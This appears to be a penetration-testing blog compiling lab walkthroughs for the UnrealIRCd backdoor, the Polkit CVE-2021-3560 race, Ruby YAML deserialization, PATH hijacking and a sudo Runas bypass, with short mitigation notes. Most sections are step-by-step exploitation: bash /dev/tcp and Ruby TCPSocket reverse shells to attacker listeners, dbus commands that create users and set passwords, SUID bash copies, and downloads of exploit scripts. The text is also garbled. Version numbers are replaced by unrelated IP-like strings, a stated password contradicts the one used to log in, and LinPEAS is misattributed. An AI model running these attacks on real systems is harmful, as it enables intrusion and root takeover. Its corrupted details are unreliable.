UnrealIRCd contains a backdoor in the DEBUG3_DOLOG_SYSTEM macro. Various mirror sites hosting Unreal184.108.40.206.tar.gz with the 752e46f2d873c1679fa99de3f52a274d Md5 checksum since November 2009 have been compromised. A remote attacker could exploit this vulnerability to execute arbitrary commands with privileges of the application. CVE-2010-2075
UnrealIRCd, an open-source Internet Relay Chat (IRC) server, typically uses a few specific ports for its operation. Here are the commonly used ports by UnrealIRCd:
- Port 6667: This is the default port for IRC servers. It is used for plaintext, unencrypted IRC communication. Clients can connect to the IRC server using this port to join chat rooms and interact with other users.
- Port 6697: This port is commonly used for secure IRC communication over SSL/TLS. It provides an encrypted connection between the IRC server and clients, ensuring data confidentiality and integrity.
- Port 7000: Often used for IRC over SSL/TLS (encrypted communication) as an alternative to port 6697. Some IRC networks or services may choose to use this port instead
UnrealIRCd UnrealIRCd 220.127.116.11
1. First step would be to identify the open ports in the server
- nmap -p- -T 5 10.10.10.117 --max-retries 1
2. Now identify the version of the application, you can connect to the UnrealIRC port (6667, 6697, 7000), based on https://www.rfc-editor.org/rfc/rfc1459 , you can connect to the server using telnet, or netcat.
- telnet 10.10.10.117 6697
- (OPTIONAL) netcat 10.10.10.117 6697
3. We can authenticate and connect to the server to find out the version
- PASS vry4n
- NICK vry4n
- USER vry4n atVK9 Security :vry4n
Note: the version is 18.104.22.168
Version enumeration using nmap
1. Run the /usr/share/nmap/scripts/irc-info.nse script against the UnrealIRC port
- nmap -p 6667 -sV 192.168.142.128 --script=irc-info
Exploiting using Nmap (irc-unrealircd-backdoor.nse)
1. Nmap has a script that exploits this vulnerability, once we have confirmed the server has the vulnerable version we can, start a netcat listener on our local machine
2. Now proceed to run the following command, feel free to modify the command injection as you please (--script-args=irc-unrealircd-backdoor.command='')
- nmap -d -p6697 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='bash -c "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1"' 10.10.10.117
3. After a while check the listener
Exploitation using a Script
1. We can try to exploit this vulnerability using the script (https://github.com/Ranger11Danger/UnrealIRCd-22.214.171.124-Backdoor/tree/master)
- git clone https://github.com/Ranger11Danger/UnrealIRCd-126.96.36.199-Backdoor.git
- cd UnrealIRCd-188.8.131.52-Backdoor
2. Display the options
3. Edit the source code, and add the local_ip & local_port
- local_ip = '10.10.14.9'
- local_port = '7777'
4. Start a listener
5. After editing the source code, run the application
- python3 exploit.py -payload bash 10.10.10.117 6697
6. Check the listener
Note: A reverse connection should be started.
Exploitation using Metasploit (unreal_ircd_3281_backdoor)
1. This module exploits a malicious backdoor that was added to the Unreal IRCD 184.108.40.206 download archive. This backdoor was present in the Unreal220.127.116.11.tar.gz archive between November 2009 and June 12th 2010.
- use exploit/unix/irc/unreal_ircd_3281_backdoor
- show options
2. Set the remote host and optionally set the remote port
- set RHOSTS 192.168.142.128
- (OPTIONAL) set RPORT 6697
3. Show the payload options and use one of them
- show options
- set payload payload/cmd/unix/reverse_ruby
4. Set the local IP and port, then start the exploit
- set LHOST 192.168.142.129
- (OPTIONAL) set LPORT 7777
The best recommendation will be to upgrade to the latest version released by the vendor. Refer to unrealsecadvisory 20100612 for patch, upgrade or suggested workaround information. Re-download the software, verify it using the published MD5 / SHA1 checksums, and re-install it.
You can check by running 'md5sum Unreal18.104.22.168.tar.gz', it should
output: 7b741e94e867c0a7370553fd01506c66 Unreal22.214.171.124.tar.gz
For reference, here are the md5sums for ALL proper files:
CVE-2021-3560 has emerged as a significant concern for Linux-based systems. This security flaw, also known as the "Polkit" vulnerability, allows local attackers to gain root privileges, potentially leading to complete compromise of the affected system. In this article, we will delve into the details of CVE-2021-3560, its impact, and recommended measures to mitigate the risk.
What is Polkit
Polkit, also known as PolicyKit, is a framework used in Linux systems for defining and managing policies related to system privileges and access control. It provides a way to control permissions for various actions and resources, allowing non-root users to perform administrative tasks without granting them full superuser (root) privileges.
The primary purpose of Polkit is to facilitate fine-grained authorization decisions based on defined policies. It allows system administrators to specify rules and conditions for granting or denying access to privileged operations, such as system configuration changes, device management, or software installation.
Here's a high-level overview of how Polkit works:
- Policy Definitions: Polkit relies on policy definitions that specify the desired authorization rules. These policies are usually defined in XML files located in the /etc/polkit-1/ directory. The policies describe the actions, authentication requirements, and associated privileges.
- Authentication Agents: When a user requests an action that requires elevated privileges, such as modifying system settings, a Polkit-aware application or process checks the policy associated with that action. If the policy allows the user to perform the action, an authentication agent is invoked.
- Authentication Dialog: The authentication agent presents an authentication dialog to the user, prompting for credentials, such as a password or biometric authentication. The dialog can vary depending on the desktop environment or the specific application invoking Polkit.
- Authorization Check: The entered credentials are verified against the authentication requirements specified in the policy. If the credentials are valid and meet the criteria, Polkit grants the user temporary authorization to perform the requested action with elevated privileges.
- Action Execution: With the temporary authorization, the requesting application or process can proceed to execute the action with the necessary privileges. Once the action is completed or the authorization expires, the elevated privileges are revoked.
What is dbus
dbus is a message system for applications to talk to one another (known as IPC or interprocess communication). This was developed as part of the freedesktop.org project. A basic dbus command to list system services looks like this:
- dbus-send --system --dest=org.freedesktop.DBus --type=method_call --print-reply /org/freedesktop/DBus org.freedesktop.DBus.ListNames
dbus stores service files in /usr/share/dbus-1/system-services
- cd /usr/share/dbus-1/system-services
- ls -la
Accounts. service which triggers accounts-daemon to perform user addition/modification options.
- cat org.freedesktop.Accounts.service
Using this service file to add an user
- dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:vry4n string:"vry4n user" int32:1
--system: sends message to the system bus
--dest: name of the connection (interface) that receives the message
--type: method_call means a system function with arguments being passed
--print-reply: prints the output in human-readable format
/org/freedesktop/Accounts: This is the function that will be used
org.freedesktop.Accounts.CreateUser: Method that will be used. Here, create user method is used which will essentially create a new user with the name specified in string 1. String 2 is the name (“ignite user”) that will be visible in the system. int32 is an integer argument the method takes in that specifies the type of account encoded as an integer.
Overview of CVE-2021-3560:
CVE-2021-3560 is a privilege escalation vulnerability that affects the Polkit system service, which provides an authorization framework for granting privileges in Linux distributions. Polkit, also known as PolicyKit, is commonly used to handle authorization decisions, allowing non-root users to perform certain administrative tasks with the appropriate permissions.
The vulnerability resides in the Polkit's handling of authentication credentials. A flaw in the implementation allows a local attacker with a low-privileged account to bypass the authentication process and execute arbitrary commands with elevated privileges. This could result in unauthorized access, data compromise, and potential system-wide impact.
The exact vulnerable piece of code in the provided Polkit code is located in the on_response function. Here are the lines that introduce the vulnerability:
The vulnerability lies in the polkit_agent_listener_handle_response function, which processes the response received from the Polkit authentication agent. The flaw allows an authenticated user to bypass the authentication process and execute arbitrary commands with elevated privileges.
By manipulating the response or injecting a malicious response, an attacker can exploit the race condition within the authentication process and gain unauthorized root access.
The vulnerability affects various Linux distributions that utilize Polkit versions before 0.119. This includes popular distributions like Ubuntu, Debian, Fedora, CentOS, and their derivatives. It is crucial for administrators and users of these distributions to promptly address the vulnerability to prevent potential exploitation.
polkit 0.105-26 0.117-2
polkit polkit 0.113
polkit polkit 0.118
Red Hat Enterprise Linux 8
Fedora 21 (or later)
Debian Testing (“Bullseye”)
Ubuntu 20.04 LTS (“Focal Fossa”)
1. In order to identify the version of the PolicyKit (polkit) we can run the following commands
- rpm -qa | grep -i polkit
- rpm -qa | grep -i policykit
- apt list --installed | grep -i policykit
- apt list --installed | grep -I polkit
(Optional) 2. Check these 2 services are available
- rpm -qa | grep -i accountsservice
- rpm -qa | grep -i gnome-control-center
To exploit CVE-2021-3560, an attacker must have a local account on the targeted Linux system. By leveraging a race condition in the Polkit's authentication mechanism, an attacker can trick the system into granting privileged access. This is achieved by simultaneously requesting an authentication action and replacing it with a different, unauthorized action before the authentication process completes.
Upon successful exploitation, the attacker can execute commands with elevated privileges, essentially gaining root access to the system. This level of control opens the door for further malicious activities, such as installing malware, modifying system configurations, exfiltrating sensitive data, or launching additional attacks within the compromised environment.
1. For the exploit to work, we need to kill the command while it is being executed. For this we need to check the time it takes to execute this command.
- time dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:vry4n string:"vry4n user" int32:1
2. As you can see, it takes me 0.059 seconds to execute this command. So, I need to kill my payload before 0.059 seconds for it to work. (Run it many times, it usually doesn’t work at first, it took me like 14 times, confirm by running “cat /etc/passwd”
- dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts org.freedesktop.Accounts.CreateUser string:vry4n string:"vry4n user" int32:1 & sleep 0.0035s ; kill $!
- cat /etc/passwd | tail -n 5
Note: The User Vry4n has been added
3. Next, we need to supply the password using dbus so that we can use this newly created user. We need to generate a hashed password as dbus-send takes in hashed password as input.
- openssl passwd -5 vry4n@123
- Result: $5$kQUWJ.fDBUvxYaRy$XJoPnNSwyteh.YXstbXAV1l79lttePHafkIBR/KFEd9
4. Now we need to pass this hash in User.SetPassword function using dbus under a string parameter. The payload looks like, (also run this command multiple times until success), User1005 means the user ID which needs to match what is in /etc/passwd
- dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:' $5$kQUWJ.fDBUvxYaRy$XJoPnNSwyteh.YXstbXAV1l79lttePHafkIBR/KFEd9' string:BestHackingTutorials & sleep 0.0035s ; kill $!
5. Once the User add & the Password change commands succeed, one after the other, we can proceed to log in Username: Vry4n & Password: 123456
- su vry4n
- Password: 123456
- sudo su
#1 - Exploitation using a Script
1. This is a script that automates this task, first of all let’s download it, start a web server to transfer it to the target machine
- git clone https://github.com/secnigma/CVE-2021-3560-Polkit-Privilege-Esclation.git
- cd CVE-2021-3560-Polkit-Privilege-Esclation
- python3 -m http.server 9999
2. Now, transfer the file into the target machine, and run it ([!] If the username is inserted, but the login fails; try running the exploit again.)
- bash poc.sh
- Credentials: secnigma: secnigmaftw
#2 Exploitation using a Script
1. In this example we are going to test, https://www.exploit-db.com/exploits/50011, This is another bash script that can be used as an alternative. Transfer the file into the target machine and run it. (if username added to /etc/passwd and the password doesn’t work, run it several times until it succeeds)
- vi exploit.sh
- bash exploit.sh
2. Now try to switch to that user (hacked:password)
- su hacked
- Password: password
- sudo su -
- Password: password
#3 Exploitation using a Script
1. We can try this other alternative written in python (https://github.com/UNICORDev/exploit-CVE-2021-3560), so download it in your local machine, then start a web server to deploy it into the target machine
- git clone https://github.com/UNICORDev/exploit-CVE-2021-3560.git
- cd exploit-CVE-2021-3560
- python3 -m http.server 9999
2. Download the file from our web server, then, run the application
- wget http://10.10.14.8:9999/exploit-CVE-2021-3560.py
- python3 exploit-CVE-2021-3560.py
3. After successful execution, elevate the privileges(Username: unicord & Password: unicord), if it doesn’t work the first time, run it several times. Verify the user has been added by reading /etc/passwd file
- su unicord
- Password: unicord
- sudo su
- Password: unicord
Mitigation and Remediation:
Linux system administrators and users are strongly advised to take the following actions to mitigate the risks associated with CVE-2021-3560:
Update Polkit: Apply the latest security patches and updates provided by the respective Linux distribution. These updates typically include the patched version of Polkit, addressing the vulnerability. Keeping the system up to date is essential for maintaining a secure environment.
Monitor Security Advisories: Stay informed about security advisories and notifications from the Linux distribution's official channels. This ensures timely awareness of vulnerabilities and recommended remediation steps.
Restrict Privileges: Implement the principle of least privilege (PoLP) by limiting user privileges to only those necessary for their tasks. Minimizing the number of accounts with administrative privileges can significantly reduce the potential impact of privilege escalation vulnerabilities.
Security Audits: Conduct regular security audits and vulnerability assessments to identify potential weaknesses and ensure that systems are adequately protected. Tools like LinPEAS.sh, which performs comprehensive scans for privilege escalation vulnerabilities, can be useful in this regard.
LinPEAS is a script that search for possible paths to escalate privileges on Linux/Unix*/MacOS hosts.
LinPEAS.sh is a script used for privilege escalation and enumeration on Linux systems. It is part of the LinEnum project, which is a collection of scripts and tools designed to assist in the discovery and exploitation of Linux vulnerabilities and weaknesses.
LinPEAS.sh, specifically, focuses on identifying misconfigurations, insecure settings, and other potential security issues that could lead to privilege escalation. It scans the system for various indicators and gathers information about the operating system, running processes, network connections, installed software, file permissions, and more.
The script performs a comprehensive analysis of the system, looking for common security weaknesses such as world-writable files, misconfigured cron jobs, weak file permissions, unquoted service paths, and other potential vulnerabilities that can be exploited by an attacker.
By running LinPEAS.sh, system administrators and security professionals can quickly identify potential security risks and take appropriate actions to mitigate them. It is a useful tool for both offensive security assessments and defensive security measures.
It's worth noting that LinPEAS.sh should only be used on systems that you have permission to test or analyze. Running it on unauthorized systems or without proper authorization may be illegal and violate the system owner's privacy and security rights. Always ensure you have proper authorization and follow ethical guidelines when using such tools.
How to use
1. Download the Script (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS)
- curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh > LinPEAS.sh
2. Send the file into the server, prepare a web server for the transfer
- python3 -m http.server 9999
3. Download from the remote machine
- wget http://10.10.14.8:9999/LinPEAS.sh
4. Run the application
Understanding Insecure Deserialization
Deserialization is the process of transforming serialized data, such as YAML or JSON, back into its original form. Insecure deserialization occurs when untrusted data is deserialized without proper validation, leading to potential security risks. Attackers can exploit this vulnerability to execute arbitrary code, bypass authentication, or perform other malicious activities.
YAML in Ruby:
Ruby, a popular programming language known for its simplicity and flexibility, provides built-in support for YAML parsing. YAML (YAML Ain't Markup Language) is a human-readable data serialization format commonly used for configuration files and data exchange. However, YAML's ease of use can inadvertently introduce security vulnerabilities if not handled correctly.
Risks of Insecure Deserialization:
Insecure deserialization in Ruby's YAML parser can have severe consequences. Attackers may manipulate serialized data to exploit vulnerable code paths, leading to remote code execution or denial of service attacks. It's crucial to understand the potential risks and adopt preventive measures.
The pre-requisites are as follows:
- The ActiveSupport gem must be installed and loaded.
- ERB from the standard library must be loaded (which Ruby does not load by default).
- After deserialization, a method that does not exist must be called on the deserialized object.
While these pre-requisites will almost certainly be fulfilled in the context of any Ruby on Rails web application, they are rarely fulfilled by other Ruby applications.
Universal gadget for ruby <= 2.7.2:
Universal gadget for ruby 2.x - 3.x.
1. In this case we have an application that reads/runs “dependencies.yml”, it uses Yaml.load(File_read()) to load the file. This Ruby script was found to run as sudo without password, it also doesn’t specify the specify path for the file
2. If we read the file “update_dependencies.rb”, we will find yaml.load in the script, and it uses the function File_read()
- cat /opt/update_dependencies.rb
3. Verify the ruby version
3. Now, its time to read “dependencies.yml
1. Now that we know the version of ruby we can apply the right syntax (Universal gadget for ruby 2.x - 3.x) in our case as ruby version is 2.7.4, we will create a file in /tmp , name it as “dependencies.yml”, and inject the Linux command “id”
- cd /tmp
- vi dependencies.yml
- cat dependencies.yml
2. Run the command, we’ll notice the output of the “id” Linux command
- sudo /usr/bin/ruby /opt/update_dependencies.rb
3. Knowing we can execute commands, we can try to elevate our privileges, in this case I will start a listener in my local machine, and run a ruby reverse shell to communicate on port 5555
Listener local machine
YAML payload in the remote machine
- vi dependencies.yml
- cat dependencies.yml
- ADD: git_set: ruby -rsocket -e'spawn("sh",[:in,:out,:err]=>TCPSocket.new("10.10.14.8",5555))'
4. Check the listener, you should have a reverse shell with privilege rights
Best Practices to Mitigate Insecure Deserialization:
To mitigate insecure deserialization vulnerabilities in Ruby YAML, developers should follow these best practices:
a. Validate Input: Implement strict input validation to ensure that only trusted data is deserialized.
b. Use Safe Loading: Enable safe loading mode during YAML parsing to restrict object creation to basic types, reducing the risk of code execution.
c. Employ Whitelisting: Restrict allowed classes during deserialization to prevent the creation of potentially dangerous objects.
d. Sanitize User Input: Treat user input as untrusted and sanitize it thoroughly before deserialization.
e. Regular Updates: Keep the Ruby interpreter, YAML library, and dependencies up to date to benefit from security patches and bug fixes.
Portswigger - Insecure Deserialization
Linux path hijacking, also known as path traversal or privilege escalation, is a security vulnerability that occurs when an attacker manipulates the system's search path to execute malicious code or gain elevated privileges. This type of attack typically targets vulnerable applications that do not properly validate user-supplied input when searching for files or executing commands.
The $PATH environment variable plays a crucial role in Linux systems by defining a list of directories where the operating system searches for executable files. However, when applications fail to properly validate and sanitize user input when utilizing the $PATH variable, a vulnerability known as path hijacking or privilege escalation can arise.
Path hijacking occurs when an attacker manipulates the $PATH variable to force the system to execute a malicious file instead of the intended command. By placing a directory under their control at the beginning of $PATH, the attacker ensures their files are discovered first during the search process.
Here's an explanation of the path hijacking process:
- Path Environment Variable: Linux systems have an environment variable called "PATH" that contains a list of directories in which the system searches for executable files. When a command is executed, the system looks for the corresponding executable file in these directories in the order specified by the PATH variable.
- Finding a Vulnerable Application: The attacker looks for a vulnerable application that performs file operations or executes commands without properly validating user-supplied input or controlling the search path. For example, an application that uses relative paths or does not sanitize user input.
- Identifying the Vulnerable Path: The attacker identifies a vulnerable point in the application where the input is used to construct a file path or command without proper validation. The goal is to find a way to manipulate the path used by the application to execute arbitrary files or commands.
- Crafting the Attack: The attacker provides input that includes special characters or sequences to manipulate the path. These characters or sequences are designed to bypass security checks and allow the attacker to traverse directories or execute arbitrary files.
- Exploiting the Vulnerability: By carefully constructing the input, the attacker can trick the vulnerable application into executing a malicious file or command. This can lead to various consequences, such as arbitrary code execution, unauthorized access, or privilege escalation.
Example: Malicious Script Execution
Let's consider an application called "insecure_app" that executes a user-supplied script based on the value of $PATH. The code snippet below demonstrates this scenario:
In this case, an attacker modifies their own $PATH variable:
The attacker then creates a malicious script named "ls" in their "home/attacker" directory. Upon executing "insecure_app ls," the malicious script is run instead of the legitimate "ls" command.
1. We found a file being that can be executed with sudo permissions
2. Inspecting the file contents we see that it runs gzip to back up some files
- cat /opt/scripts/access_backup.sh
1. Knowing we can execute this file with elevated permissions we proceed to play with its logic, first we will find out where is gzip located and if the location is included within $PATH environment variable
2. We can now proceed to modify the $PATH environment variable to point to /tmp and save our new script named “gzip” there, this basic script will create a new empty file in /tmp, we want to verify that the permissions are root
- export PATH=/tmp:$PATH
- echo $PATH
- echo -ne '#!/bin/bash\ntouch test.txt' > gzip
- chmod 777 gzip
- sudo /opt/scripts/access_backup.sh
3. We confirmed that the test.txt file was created with the privileges of root. We can now further exploit this vulnerability by copying /bin/bash, making it accessible to anyone, and run it
- echo -ne '#!/bin/bash\ncp /bin/bash /tmp/bash\nchmod 4755 /tmp/bash' > gzip
- cat gzip
- chmod 777 gzip
- sudo /opt/scripts/access_backup.sh
4. Now run this new bash that has SUID bit set to elevate privileges
To mitigate path hijacking vulnerabilities, several preventive measures should be taken:
- Validate and Sanitize User Input: Applications must carefully validate and sanitize any user-supplied input to prevent malicious manipulation of the $PATH variable.
- Absolute Paths: Avoid relying solely on the $PATH variable for command execution. Instead, use absolute paths to ensure the intended executable is executed.
- Least Privilege Principle: Limit the privileges of applications and users to minimize the potential impact of a successful path hijacking attack.
- Regular Updates: Keep the system and software up to date to benefit from security patches and fixes that address path hijacking vulnerabilities.
Sudo could allow a local authenticated attacker to bypass security restrictions , caused by an issue with running commands with arbitrary user ID. By using the ALL keyword in a Runas specification, an attacker could exploit this vulnerability to bypass security restrictions and execute arbitrary command on the system with root privileges.
1. Find the version of sudo
2. Also, see the privileges on sudo (ALL, !root) is key
1. Run this command to trick sudo and execute /bin/bash as root, you need to use the current user password to authenticate sudo
Upgrade to the latest version of Sudo (1.8.28 or later), available from the Sudo Web site.